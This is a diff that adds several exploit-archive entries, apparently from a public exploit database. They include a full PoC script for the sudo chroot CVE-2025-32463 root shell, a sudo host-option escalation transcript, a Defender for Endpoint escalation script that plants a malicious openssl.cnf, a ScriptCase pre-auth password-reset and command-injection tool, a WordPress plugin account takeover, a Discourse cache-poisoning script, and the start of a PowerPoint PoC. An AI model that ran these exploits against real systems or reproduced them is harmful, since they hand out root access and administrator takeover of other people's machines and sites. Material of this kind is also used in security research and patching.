diff --git a/exploits/linux/local/52352.txt b/exploits/linux/local/52352.txt
new file mode 100644
index 000000000..6e4f7aaa9
--- /dev/null
+++ b/exploits/linux/local/52352.txt
@@ -0,0 +1,98 @@
+Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
+Google Dork: not aplicable
+Date: Mon, 30 Jun 2025
+Exploit Author: Stratascale
+Vendor Homepage:https://salsa.debian.org/sudo-team/sudo
+Software Link:
+Version: Sudo versions 1.9.14 to 1.9.17 inclusive
+Tested on: Kali Rolling 2025-7-3
+CVE : CVE-2025-32463
+
+*Version running today in Kali:*
+https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
+
+*Background*
+
+An attacker can leverage sudo's -R (--chroot) option to run
+arbitrary commands as root, even if they are not listed in the
+sudoers file.
+
+Sudo versions affected:
+
+    Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
+
+CVE ID:
+
+    This vulnerability has been assigned CVE-2025-32463 in the
+    Common Vulnerabilities and Exposures database.
+
+Details:
+
+    Sudo's -R (--chroot) option is intended to allow the user to
+    run a command with a user-selected root directory if the sudoers
+    file allows it.  A change was made in sudo 1.9.14 to resolve
+    paths via chroot() using the user-specified root directory while
+    the sudoers file was still being evaluated.  It is possible for
+    an attacker to trick sudo into loading an arbitrary shared
+    library by creating an /etc/nsswitch.conf file under the
+    user-specified root directory.
+
+    The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
+    and the chroot feature has been marked as deprecated.  It will
+    be removed entirely in a future sudo release.  Because of the
+    way sudo resolves commands, supporting a user-specified chroot
+    directory is error-prone and this feature does not appear to
+    be widely used.
+
+    A more detailed description of the bug and its effects can be
+    found in the Stratascale advisory:
+    https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
+
+Impact:
+
+    On systems that support /etc/nsswitch.conf a user may be able
+    to run arbitrary commands as root.
+
+*Exploit:*
+
+*Verify the sudo version running: sudo --versionIf is vulnerable, copy and
+paste the following code and run it.*
+*----------------------*
+#!/bin/bash
+# sudo-chwoot.sh – PoC CVE-2025-32463
+set -e
+
+STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
+cd "$STAGE"
+
+# 1. NSS library
+cat > woot1337.c <<'EOF'
+#include <stdlib.h>
+#include <unistd.h>
+
+__attribute__((constructor))
+void woot(void) {
+    setreuid(0,0);          /* change to UID 0 */
+    setregid(0,0);          /* change  to GID 0 */
+    chdir("/");             /* exit from chroot */
+    execl("/bin/bash","/bin/bash",NULL); /* root shell */
+}
+EOF
+
+# 2. Mini chroot with toxic nsswitch.conf
+mkdir -p woot/etc libnss_
+echo "passwd: /woot1337" > woot/etc/nsswitch.conf
+cp /etc/group woot/etc            # make getgrnam() not fail
+
+# 3. compile libnss_
+gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
+
+echo "[*] Running exploit…"
+sudo -R woot woot                 # (-R <dir> <cmd>)
+                                   # • the first “woot” is chroot
+                                   # • the second “woot” is and inexistent
+command
+                                   #   (only needs resolve the user)
+
+rm -rf "$STAGE"
+*----------------------*
\ No newline at end of file
diff --git a/exploits/linux/local/52354.txt b/exploits/linux/local/52354.txt
new file mode 100644
index 000000000..95530a4f4
--- /dev/null
+++ b/exploits/linux/local/52354.txt
@@ -0,0 +1,60 @@
+# Exploit Title: Sudo 1.9.17 Host Option - Elevation of Privilege
+# Date: 2025-06-30
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://www.sudo.ws
+# Software Link: https://www.sudo.ws/dist/sudo-1.9.17.tar.gz
+# Version: Stable 1.9.0 - 1.9.17, Legacy 1.8.8 - 1.8.32
+# Fixed in: 1.9.17p1
+# Vendor Advisory: https://www.sudo.ws/security/advisories/host_any
+# Blog:
+https://www.stratascale.com/vulnerability-alert-CVE-2025-32462-sudo-host
+# Tested on: Ubuntu 24.04.1; Sudo 1.9.15p5, macOS Sequoia 15.3.2; Sudo
+1.9.13p2
+# CVE : CVE-2025-32462
+#
+No exploit is required. Executing a sudo or sudoedit command with the host
+option referencing an unrelated remote host rule causes Sudo to treat the
+rule as valid for the local system. As a result, any command allowed by the
+remote host rule can be executed on the local machine.
+
+Example /etc/sudoers file using the Host_Alias directive. The lowpriv user
+is allowed to execute all commands (full root) on dev.test.local,
+ci.test.local, but not prod.test.local.
+
+Host_Alias     SERVERS        = prod.test.local, dev.test.local
+Host_Alias     PROD           = prod.test.local
+lowpriv          SERVERS, !PROD = NOPASSWD:ALL
+lowpriv           ci.test.local  = NOPASSWD:ALL
+
+Even though the prod.test.local server is explicitly denied for the lowpriv
+user, root access is achieved by specifying the host option for the
+dev.test.local or ci.test.local servers.
+
+Example
+
+Show that lowpriv is not allowed to execute sudo on the prod server.
+
+lowpriv@prod:~$ id
+uid=1001(lowpriv) gid=1001(lowpriv) groups=1001(lowpriv)
+lowpriv@prod:~$ sudo -l
+[sudo] password for lowpriv:
+Sorry, user lowpriv may not run sudo on prod.
+
+List the host rules for the dev.test.local server.
+
+lowpriv@prod:~$ sudo -l -h dev.test.local
+Matching Defaults entries for lowpriv on dev:
+    env_reset, mail_badpass,
+secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
+use_pty
+
+User lowpriv may run the following commands on dev:
+    (root) NOPASSWD: ALL
+
+Execute a root shell on prod.test.local by specifying the -h dev.test.local
+option.
+
+lowpriv@prod:~$ sudo -h dev.test.local -i
+sudo: a remote host may only be specified when listing privileges.
+root@prod:~# id
+uid=0(root) gid=0(root) groups=0(root)
\ No newline at end of file
diff --git a/exploits/multiple/local/52355.txt b/exploits/multiple/local/52355.txt
new file mode 100644
index 000000000..b2fc7fbf3
--- /dev/null
+++ b/exploits/multiple/local/52355.txt
@@ -0,0 +1,78 @@
+#!/bin/bash
+# Exploit Title: Microsoft Defender for Endpoint (MDE) - Elevation of Privilege
+# Date: 2025-05-27
+# Exploit Author: Rich Mirch
+# Vendor Homepage: https://learn.microsoft.com/en-us/defender-endpoint/
+# Software Link:
+https://learn.microsoft.com/en-us/defender-endpoint/microsoft-defender-endpoint-linux
+# Versions:
+# Vulnerable March-2025 Build: 101.25012.0000 30.125012.0000.0
+# Vulnerable Feb-2025 Build: 101.24122.0008  20.124112.0008.0
+# Vulnerable Feb-2025 Build: 101.24112.0003  30.124112.0003.0
+# Vulnerable Jan-2025 Build: 101.24112.0001   30.124112.0001.0
+# Vulnerable Jan-2025 Build: 101.24102.0000  30.124102.0000.0
+#
+# Vendor Advisory:
+https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47161
+# Blog: http://stratascale.com/vulnerability-alert-cve202547161
+# Tested on: Ubuntu 24.04.1 LTS and 24.04.2 LTS
+# CVE : CVE-2025-47161
+#
+echo "MDE Version: $(mdatp version)"
+
+# stage
+cat >mde-exp.c<<EOF
+/*
+* Build procedure:
+* gcc -fPIC -o woot.o -Wall -c woot.c
+* gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
+*/
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/stat.h>
+
+void woot(){
+    // for manual testing
+    if(isatty(STDERR_FILENO)) {
+        fprintf(stderr,"Woot!\n");
+    }
+    system("ps -ef > /woot.txt");
+    sleep(3000000);
+}
+
+EOF
+
+# build exploit
+gcc -fPIC -o woot.o -Wall -c mde-exp.c
+gcc -Wall -shared -Wl,-soname,woot.so -Wl,-init,woot -o /tmp/woot.so woot.o
+
+mkdir -p /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/
+
+cat > /tmp/build/osquery/build/installed_formulas/openssl/etc/openssl/openssl.cnf
+<<EOF
+# Malicious openssl.cnf
+openssl_conf = openssl_init
+[openssl_init]
+engines = engine_section
+
+[engine_section]
+woot = woot_section
+
+[woot_section]
+engine_id = woot
+dynamic_path = /tmp/woot.so
+init = 0
+EOF
+
+echo "Checking every 15 seconds for /woot.txt"
+while true
+do
+    if [[ -f /woot.txt ]]
+    then
+        echo "WOOT - /woot.txt exists"
+    ls -ld /woot.txt
+    exit
+    fi
+    sleep 15
+done
\ No newline at end of file
diff --git a/exploits/multiple/remote/52353.py b/exploits/multiple/remote/52353.py
new file mode 100755
index 000000000..2b6821cfd
--- /dev/null
+++ b/exploits/multiple/remote/52353.py
@@ -0,0 +1,330 @@
+# Exploit Title: ScriptCase 9.12.006 (23) - Remote Command Execution (RCE)
+# Date: 04/07/2025
+# Exploit Author: Alexandre ZANNI (noraj) & Alexandre DROULLÉ (cabir)
+# Vendor Homepage: https://www.scriptcase.net/
+# Software Link: https://www.scriptcase.net/download/
+# Version: 1.0.003-build-2 (Production Environment) / 9.12.006 (23) (ScriptCase)
+# Tested on: EndeavourOS
+# CVE : CVE-2025-47227, CVE-2025-47228
+# Source: https://github.com/synacktiv/CVE-2025-47227_CVE-2025-47228
+# Advisory: https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution
+
+# Imports
+## stdlib
+import io
+import random
+import optparse
+import re
+import string
+import sys
+import urllib.parse
+## third party
+from PIL import Image, ImageEnhance, ImageFilter # pip3 install Pillow
+import pytesseract # pip3 install pytesseract
+import requests # pip install requests
+from bs4 import BeautifulSoup # pip install beautifulsoup4
+
+# Clean image + OCR
+def process_image(input_image, output_image_path=None):
+    # Open the image
+    img = Image.open(io.BytesIO(input_image))
+
+    # Convert the image to RGB (in case it's in a different mode)
+    img = img.convert('RGB')
+
+    # Load the pixel data
+    pixels = img.load()
+
+    # Get the dimensions of the image
+    width, height = img.size
+
+    # Process each pixel
+    for y in range(height):
+        for x in range(width):
+            r, g, b = pixels[x, y]
+            # Change the crap background to a fixed color (letters are only black or white, and background is random color but not black or white)
+            if (r, g, b) != (0, 0, 0) and (r, g, b) != (255, 255, 255):
+                pixels[x, y] = (211, 211, 211) # Change the pixel to light grey
+            elif (r, g, b) == (255, 255, 255): # Change white text in black text
+                pixels[x, y] = (0, 0, 0) # Change the pixel to black
+
+    # Size (200, 50) * 5
+    img = img.resize((1000,250), Image.Resampling.HAMMING)
+
+    # Use Tesseract to convert the image to text
+    # psm 6 or 8 work best
+    # limit alphabet
+    # disable word optimized detection https://github.com/tesseract-ocr/tessdoc/blob/main/ImproveQuality.md#dictionaries-word-lists-and-patterns
+    custom_oem_psm_config = rf'--psm 8 --oem 3 -c tessedit_char_whitelist={string.ascii_letters} -c load_system_dawg=false -c load_freq_dawg=false --dpi 300' # there are only uppercase but keep lowercase to avoid false negative
+    text = pytesseract.image_to_string(img, config=custom_oem_psm_config)
+    return(text.upper().strip()) # convert false positive lowercase to uppercase, strip because leading whitespace is often added
+
+# Step 1: Set is_page to true on the session
+def prepare_session(url_base, cookies):
+    res = requests.get(
+        f'{url_base}/prod/lib/php/devel/iface/login.php',
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200:
+        print("[+] Session prepared")
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+
+# Random hex string of arbitrary size
+def rand_hex(size):
+    return ''.join(random.choice('0123456789abcdef') for _ in range(size))
+
+# Step 2: Get a captcha challenge for the session
+def captcha_session(url_base, cookies):
+    res = requests.get(
+        f'{url_base}/prod/lib/php/devel/lib/php/secureimage.php',
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200:
+        print("[+] Captcha retrieved")
+        return res.content
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+
+# Step 3: Change the password with the prepared session
+def reset_password(url_base, cookies, captcha_img, captcha_txt):
+    new_password = random.choice(string.ascii_letters).capitalize() + rand_hex(10) + str(random.randint(0,9))
+    email = f'{rand_hex(10)}@{rand_hex(8)}.com'
+    data = {
+        'ajax': 'nm',
+        'nm_action': 'change_pass',
+        'email': email,
+        'pass_new': new_password,
+        'pass_conf': new_password,
+        'lang': 'en-us',
+        'captcha': captcha_txt
+    }
+    res = requests.post(
+        f'{url_base}/prod/lib/php/devel/iface/login.php',
+        data=data,
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200 and res.text == '{"result":"success"}':
+        print("[+] Password reset successfully")
+        print(f"[+] The new password is: {new_password}")
+        print(f"[+] The delcared (fake) email address was: {email}")
+    elif res.status_code == 200 and res.text == '{"result":"error","message":"Invalid captcha"}':
+        print("[-] OCR failed")
+        print(f"[-] Failed captcha submission was {captcha_txt}")
+        img = Image.open(io.BytesIO(captcha_img))
+        img.show()
+        manual_input = input("[+] Input displayed captcha to retry manually: ")
+        reset_password(url_base, cookies, captcha_img, manual_input)
+    elif res.status_code == 200 and res.text == '{"result":"error","message":"The password is incorrect."}':
+        print("[-] Non default password policy")
+        print("[-] Hardcode a password that matches it")
+        print(f"[-] Failed password is: {new_password}")
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+        print(res.text)
+        print('[-] Data was:')
+        print(data)
+
+# Detect the deployment path of ScriptCase and produciton environment from the homepage.
+# E.g. deployment path is /scriptcase/
+# sc_pathToTB variable on http://10.58.8.213/ will be '/scriptcase/prod/third/jquery_plugin/thickbox/'
+# ScriptCase login page => http://10.58.8.213/scriptcase/devel/iface/login.php
+# Production Environment login page => http://10.58.8.213/scriptcase/prod/lib/php/devel/iface/login.php
+def detect_deployment_path(homepage_url):
+    res = requests.get(homepage_url, verify=False) # HTTP redirections are handled automatically (not JS redirects)
+    if res.status_code == 200:
+        print("[+] Looking for deployment path in JS and computing login paths")
+        reg = r"var sc_pathToTB = '(.+)/prod/third/jquery_plugin/thickbox/';"
+        match = re.search(reg, res.text)
+        # compute URL without path
+        parsed_url = urllib.parse.urlparse(homepage_url)
+        homepage_root = f"{parsed_url.scheme}://{parsed_url.netloc}"
+        if match:
+            base_path = match.group(1)
+            print(f"[+] Deployment path found: {base_path}/")
+            print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php (probably not deployed on a production environment)")
+            print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
+        else: # either a website not made with ScriptCase or root redirects to the devel page
+            js_redirect(res)
+            # try to detect the devel/iface/login.php page
+            reg2 = r'http://www\.scriptcase\.net|doChangeLanguage|str_lang_user_first'
+            match = re.search(reg2, res.text)
+            if match: # devel page
+                print(f"[?] This may be the development console?")
+                # now try to extract path from favicon
+                reg3 = r'<link rel="shortcut icon" href="(.+)/devel/conf/scriptcase/img/ico/favicon\.ico"'
+                match = re.search(reg3, res.text)
+                if match: # base path found
+                    base_path = match.group(1)
+                    print(f"[+] Deployment path found: {base_path}/")
+                    print(f"[+] ScriptCase login page: {homepage_root}{base_path}/devel/iface/login.php")
+                    print(f"[+] Production Environment login page: {homepage_root}{base_path}/prod/lib/php/devel/iface/login.php")
+                else: # false positive, it's not devel page
+                    print(f"[-] Failed to find deployment path, is this site made with ScriptCase?")
+            else: # no ScriptCase detected
+                print("[-] Failed to find deployment path, is this site made with ScriptCase?")
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+
+# Try to handle JS redirect else warn and exit
+def js_redirect(res):
+    if re.search(r'window\.location', res.text):
+        print('[-] JavaScript redirection detected')
+        print('[-] JavaScript redirection not handled (no headless browser with JS engine)')
+        print(f"[-] Returned page is:\n{res.text}")
+        print(f"[-] Last redirection URL is:\n{res.url}")
+        match = re.search(r"window\.location\s*=\s*['\"](.+)['\"]", res.text)
+        if match:
+            redirect_url = f"{res.url}/{match.group(1)}"
+            print(f"[?] Let's try again with: {redirect_url}")
+            detect_deployment_path(redirect_url)
+        else:
+            print('Please try again with redirect URL')
+            exit(1)
+
+# Remote command execution on the system
+#
+# Instead of registering a new connection (admin_sys_allconections_create_wizard.php), we can just test it
+# (admin_sys_allconections_test.php) so we leave less traces.
+# Even if the test results in "Connection Error" / "Unable to connect", the command was stil lexecuted.
+def command_injection(url_base, cookies, cmd):
+    data = {
+        'hid_create_connect': 'S',
+        'dbms': 'mysql',
+        'conn': 'conn_mysql',
+        'dbms': 'pdo_mysql',
+        'host': '127.0.0.1:3306',
+        'server': '127.0.0.1',
+        'port': '3306',
+        'user': rand_hex(11),
+        'pass': rand_hex(8),
+        'show_table': 'Y',
+        'show_view': 'Y',
+        'show_system': 'Y',
+        'show_procedure': 'Y',
+        'decimal': '.',
+        'use_persistent': 'N',
+        'use_schema': 'N',
+        'retrieve_schema': 'Y',
+        'retrieve_schema': 'Y',
+        'use_ssh': 'Y',
+        'ssh_server': '127.0.0.1',
+        'ssh_user': 'root',
+        'ssh_port': '22',
+        'ssh_localportforwarding': f'; {cmd};#',
+        'ssh_localserver': '127.0.0.1',
+        'ssh_localport': '3306',
+        'form_create': form_create(url_base, cookies),
+        'retornar': 'Back',
+        'concluir': 'Save',
+        'confirmar': 'Back',
+        'voltar': 'Confirm',
+        'step': 'sgdb2',
+        'nextstep': 'dados_rep'
+    }
+    res = requests.post(
+        f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_test.php',
+        data=data,
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200:
+        print("[+] Command executed (blind)")
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+        exit(1)
+
+# Get form_create ID for command_injection()
+def form_create(url_base, cookies):
+    res = requests.get(
+        f'{url_base}/prod/lib/php/devel/iface/admin_sys_allconections_create_wizard.php',
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200:
+        print("[+] Parsing results to find form_create ID")
+        soup = BeautifulSoup(res.text, 'html.parser')
+        form_create = soup.css.select_one('html body.nmPage form input[name="form_create"]')
+        if form_create:
+            form_create_id = form_create.get('value')
+            print(f"[+] form_create ID found: {form_create_id}")
+            return form_create_id
+        else:
+            print("[-] No form_create ID found")
+            exit(1)
+        return res.content
+    else:
+        print(f"[-] Failed with status code {res.status_code}")
+        exit(1)
+
+# Handles login
+#
+# Comes with a cookie as there is session fixation (cookie not renewed after login)
+def login(url_base, cookies, password):
+    data = {
+        'option': 'login',
+        'opt_par': None,
+        'hid_login': 'S',
+        'field_pass': password,
+        'field_language': 'en-us'
+    }
+    res = requests.post(
+        f'{url_base}/prod/lib/php/nm_ini_manager2.php',
+        data=data,
+        cookies=cookies,
+        verify=False
+    )
+    if res.status_code == 200:
+        print("[+] Authentication successful")
+    else:
+        print("[-] Authentication failed")
+
+# Exploit
+if __name__ == '__main__':
+    help_text = """
+    Examples:
+
+    Pre-Auth RCE (password reset + RCE)
+        python exploit.py -u http://example.org/scriptcase -c "command"
+    Password reset only (no auth)
+        python exploit.py -u http://example.org/scriptcase
+    RCE only (need account)
+        python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
+    Detect deployment path
+        python exploit.py -u http://example.org/ -d
+    """
+    parser = optparse.OptionParser(usage=help_text)
+    parser.add_option('-u', '--base-url')
+    parser.add_option('-c', '--command')
+    parser.add_option('-p', '--password')
+    parser.add_option('-d', '--detect', action='store_true', dest='detect')
+    opts, args = parser.parse_args()
+
+    cookies = {
+        'PHPSESSID': rand_hex(26) # Simulate a random PHPSESSID (more stealth than an arbitrary string)
+    }
+    URL_BASE = opts.base_url
+
+    if opts.base_url and opts.command and not opts.password and not opts.detect: # Pre-Auth RCE (password reset + RCE)
+        prepare_session(URL_BASE, cookies)
+        captcha_img = captcha_session(URL_BASE, cookies)
+        captcha_txt = process_image(captcha_img)
+        reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
+        command_injection(URL_BASE, cookies, opts.command)
+    elif opts.base_url and not opts.command and not opts.password and not opts.detect: # Password reset only (no auth)
+        prepare_session(URL_BASE, cookies)
+        captcha_img = captcha_session(URL_BASE, cookies)
+        captcha_txt = process_image(captcha_img)
+        reset_password(URL_BASE, cookies, captcha_img, captcha_txt)
+    elif opts.base_url and opts.command and opts.password and not opts.detect: # RCE only (need account)
+        prepare_session(URL_BASE, cookies)
+        login(URL_BASE, cookies, opts.password)
+        command_injection(URL_BASE, cookies, opts.command)
+    elif opts.base_url and not opts.command and not opts.password and opts.detect: # Detect deployment path
+        detect_deployment_path(URL_BASE)
+    else:
+        parser.print_help()
+        sys.exit(1)
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52357.txt b/exploits/multiple/webapps/52357.txt
new file mode 100644
index 000000000..e91b8adf7
--- /dev/null
+++ b/exploits/multiple/webapps/52357.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover
+# Date: October 25, 2024
+# Exploit Author: stealthcopter
+# Vendor Homepage: https://stacksmarket.co/
+# Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/
+# Version: <= 5.2.3
+# Tested on: Ubuntu 24.10/Docker
+# CVE: CVE-2024-50477
+# References:
+# - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md
+# - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover
+
+
+1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`:
+`/?mobile_co=1&uid=1`
+2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator).
+3. Visit `/wp-admin` — you should have full access to the admin dashboard.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/52358.py b/exploits/multiple/webapps/52358.py
new file mode 100755
index 000000000..9ecd3e157
--- /dev/null
+++ b/exploits/multiple/webapps/52358.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python3
+"""
+Exploit Title: Discourse 3.2.x - Anonymous Cache Poisoning
+Date: 2024-10-15
+Exploit Author: ibrahimsql
+Github: : https://github.com/ibrahmsql
+Vendor Homepage: https://discourse.org
+Software Link: https://github.com/discourse/discourse
+Version: Discourse < latest (patched)
+Tested on: Discourse 3.1.x, 3.2.x
+CVE: CVE-2024-47773
+CVSS: 7.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
+
+Description:
+Discourse anonymous cache poisoning vulnerability allows attackers to poison
+the cache with responses without preloaded data through multiple XHR requests.
+This affects only anonymous visitors of the site.
+
+Reference:
+https://nvd.nist.gov/vuln/detail/CVE-2024-47773
+"""
+
+import requests
+import sys
+import argparse
+import time
+import threading
+import json
+from urllib.parse import urljoin
+
+class DiscourseCachePoisoning:
+    def __init__(self, target_url, threads=10, timeout=10):
+        self.target_url = target_url.rstrip('/')
+        self.threads = threads
+        self.timeout = timeout
+        self.session = requests.Session()
+        self.session.headers.update({
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
+            'Accept': 'application/json, text/javascript, */*; q=0.01',
+            'X-Requested-With': 'XMLHttpRequest'
+        })
+        self.poisoned = False
+
+    def check_target(self):
+        """Check if target is accessible and running Discourse"""
+        try:
+            response = self.session.get(f"{self.target_url}/", timeout=self.timeout)
+            if response.status_code == 200:
+                if 'discourse' in response.text.lower() or 'data-discourse-setup' in response.text:
+                    return True
+        except Exception as e:
+            print(f"[-] Error checking target: {e}")
+        return False
+
+    def check_anonymous_cache(self):
+        """Check if anonymous cache is enabled"""
+        try:
+            # Test endpoint that should be cached for anonymous users
+            response = self.session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
+
+            # Check cache headers
+            cache_headers = ['cache-control', 'etag', 'last-modified']
+            has_cache = any(header in response.headers for header in cache_headers)
+
+            if has_cache:
+                print("[+] Anonymous cache appears to be enabled")
+                return True
+            else:
+                print("[-] Anonymous cache may be disabled")
+                return False
+
+        except Exception as e:
+            print(f"[-] Error checking cache: {e}")
+            return False
+
+    def poison_cache_worker(self, endpoint):
+        """Worker function for cache poisoning attempts"""
+        try:
+            # Create session without cookies to simulate anonymous user
+            anon_session = requests.Session()
+            anon_session.headers.update({
+                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
+                'Accept': 'application/json, text/javascript, */*; q=0.01',
+                'X-Requested-With': 'XMLHttpRequest'
+            })
+
+            # Make rapid requests to poison cache
+            for i in range(50):
+                response = anon_session.get(
+                    f"{self.target_url}{endpoint}",
+                    timeout=self.timeout
+                )
+
+                # Check if response lacks preloaded data
+                if response.status_code == 200:
+                    try:
+                        data = response.json()
+                        # Check for missing preloaded data indicators
+                        if self.is_poisoned_response(data):
+                            print(f"[+] Cache poisoning successful on {endpoint}")
+                            self.poisoned = True
+                            return True
+                    except:
+                        pass
+
+                time.sleep(0.1)
+
+        except Exception as e:
+            pass
+        return False
+
+    def is_poisoned_response(self, data):
+        """Check if response indicates successful cache poisoning"""
+        # Look for indicators of missing preloaded data
+        indicators = [
+            # Missing or empty preloaded data
+            not data.get('preloaded', True),
+            data.get('preloaded') == {},
+            # Missing expected fields
+            'categories' in data and not data['categories'],
+            'topics' in data and not data['topics'],
+            # Error indicators
+            data.get('error') is not None,
+            data.get('errors') is not None
+        ]
+
+        return any(indicators)
+
+    def test_cache_poisoning(self):
+        """Test cache poisoning on multiple endpoints"""
+        print("[*] Testing cache poisoning vulnerability...")
+
+        # Target endpoints that are commonly cached
+        endpoints = [
+            '/categories.json',
+            '/latest.json',
+            '/top.json',
+            '/c/general.json',
+            '/site.json',
+            '/site/basic-info.json'
+        ]
+
+        threads = []
+
+        for endpoint in endpoints:
+            print(f"[*] Testing endpoint: {endpoint}")
+
+            # Create multiple threads to poison cache
+            for i in range(self.threads):
+                thread = threading.Thread(
+                    target=self.poison_cache_worker,
+                    args=(endpoint,)
+                )
+                threads.append(thread)
+                thread.start()
+
+            # Wait for threads to complete
+            for thread in threads:
+                thread.join(timeout=5)
+
+            if self.poisoned:
+                break
+
+            time.sleep(1)
+
+        return self.poisoned
+
+    def verify_poisoning(self):
+        """Verify if cache poisoning was successful"""
+        print("[*] Verifying cache poisoning...")
+
+        # Test with fresh anonymous session
+        verify_session = requests.Session()
+        verify_session.headers.update({
+            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
+        })
+
+        try:
+            response = verify_session.get(f"{self.target_url}/categories.json", timeout=self.timeout)
+
+            if response.status_code == 200:
+                try:
+                    data = response.json()
+                    if self.is_poisoned_response(data):
+                        print("[+] Cache poisoning verified - anonymous users affected")
+                        return True
+                    else:
+                        print("[-] Cache poisoning not verified")
+                except:
+                    print("[-] Unable to parse response")
+            else:
+                print(f"[-] Unexpected response code: {response.status_code}")
+
+        except Exception as e:
+            print(f"[-] Error verifying poisoning: {e}")
+
+        return False
+
+    def exploit(self):
+        """Main exploit function"""
+        print(f"[*] Testing Discourse Cache Poisoning (CVE-2024-47773)")
+        print(f"[*] Target: {self.target_url}")
+
+        if not self.check_target():
+            print("[-] Target is not accessible or not running Discourse")
+            return False
+
+        print("[+] Target confirmed as Discourse instance")
+
+        if not self.check_anonymous_cache():
+            print("[-] Anonymous cache may be disabled (DISCOURSE_DISABLE_ANON_CACHE set)")
+            print("[*] Continuing with exploit attempt...")
+
+        success = self.test_cache_poisoning()
+
+        if success:
+            print("[+] Cache poisoning attack successful!")
+            self.verify_poisoning()
+            print("\n[!] Impact: Anonymous visitors may receive responses without preloaded data")
+            print("[!] Recommendation: Upgrade Discourse or set DISCOURSE_DISABLE_ANON_CACHE")
+            return True
+        else:
+            print("[-] Cache poisoning attack failed")
+            print("[*] Target may be patched or cache disabled")
+            return False
+
+def main():
+    parser = argparse.ArgumentParser(description='Discourse Anonymous Cache Poisoning (CVE-2024-47773)')
+    parser.add_argument('-u', '--url', required=True, help='Target Discourse URL')
+    parser.add_argument('-t', '--threads', type=int, default=10, help='Number of threads (default: 10)')
+    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10)')
+
+    args = parser.parse_args()
+
+    exploit = DiscourseCachePoisoning(args.url, args.threads, args.timeout)
+
+    try:
+        success = exploit.exploit()
+        sys.exit(0 if success else 1)
+    except KeyboardInterrupt:
+        print("\n[-] Exploit interrupted by user")
+        sys.exit(1)
+    except Exception as e:
+        print(f"[-] Exploit failed: {e}")
+        sys.exit(1)
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/exploits/windows/remote/52351.py b/exploits/windows/remote/52351.py
new file mode 100755
index 000000000..ca0b009da
--- /dev/null
+++ b/exploits/windows/remote/52351.py
@@ -0,0 +1,122 @@
+#!/usr/bin/env python3
+# Exploit Title: Microsoft PowerPoint 2019 - Remote Code Execution (RCE)
+# Author: Mohammed Idrees Banyamer
+# Instagram: @banyamer_security
+# GitHub: https://github.com/mbanyamer
+# Date: 2025-07-02
+# Tested on: Microsoft PowerPoint 2019 / Office 365 (version before June 2025 Patch)
+# CVE: CVE-2025-47175
+# Type: Use-After-Free (UAF) Remote Code Execution (local user required)
+# Platform: Windows (PowerPoint)
+# Author Country: Jordan
+# Attack Vector: Local (User must open crafted PPTX file)
+# Description:
+# This exploit leverages a Use-After-Free vulnerability in Microsoft PowerPoint
+# allowing an attacker to execute arbitrary code by tricking a user into opening
+# a specially crafted PPTX file. This PoC generates such a malicious PPTX file
+# designed to trigger the UAF condition.
+#
+# Steps of exploitation:
+# 1. Run this script to generate the malicious PPTX file.
+# 2. Send or trick the target user to open this file in a vulnerable PowerPoint version.
+# 3. Exploit triggers upon opening the file, leading to possible code execution.
+#
+# Note: This PoC creates a simplified PPTX file structure with crafted XML designed
+# to trigger the vulnerability. For a full exploit, further memory manipulation and shellcode injection
+# are required (not included here).
+#
+# Affected Versions:
+# Microsoft PowerPoint versions prior to June 2025 patch (KB5002689)
+#
+# Usage:
+# python3 exploit_cve2025_47175.py [options]
+#
+# Options:
+#   -o, --output   Output PPTX filename (default: exploit_cve_2025_47175.pptx)
+#   -i, --id       Shape ID (default: 1234)
+#   -n, --name     Shape Name (default: MaliciousShape)
